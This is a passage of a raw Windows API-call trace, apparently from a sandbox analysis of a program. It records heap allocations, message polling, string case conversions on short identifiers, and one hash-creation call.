[0256.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.407] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0256.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0256.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0256.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0256.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0256.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0256.408] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0256.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0256.408] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0256.408] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0256.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0256.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0256.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0256.408] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0256.408] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.408] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0256.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0256.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0256.409] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.409] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.409] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.409] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0256.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0256.409] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0256.409] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0256.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0256.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0256.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0256.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0256.409] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0256.410] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.410] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0256.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0256.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0256.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0256.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0256.410] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.410] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0256.410] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0256.410] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0256.410] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0256.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0256.410] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0256.411] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0256.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0256.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0256.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.411] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0256.411] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.411] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0256.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0256.411] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0256.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0256.411] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0256.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0256.411] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0256.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0256.412] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0256.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0256.412] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0256.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0256.412] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0256.412] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0256.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0256.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.412] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0256.412] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.412] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0256.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0256.413] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.413] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0256.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0256.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0256.413] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.413] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.413] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0256.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0256.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0256.413] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.413] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0256.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0256.414] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0256.414] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0256.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0256.414] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0256.414] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.414] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0256.414] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.414] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.415] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0256.415] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0256.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0256.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0256.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0256.415] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.415] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0256.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0256.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0256.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0256.415] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.415] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.415] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0256.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0256.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0256.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0256.416] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0256.416] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0256.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0256.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0256.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0256.416] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0256.416] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.416] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0256.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0256.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0256.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0256.417] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0256.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0256.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.417] CryptCreateHash (in: hProv=0xad2698, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0256.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0256.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0256.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0256.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0256.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0256.417] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0256.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0256.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0256.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0256.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0256.418] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.418] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0256.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0256.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0256.418] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 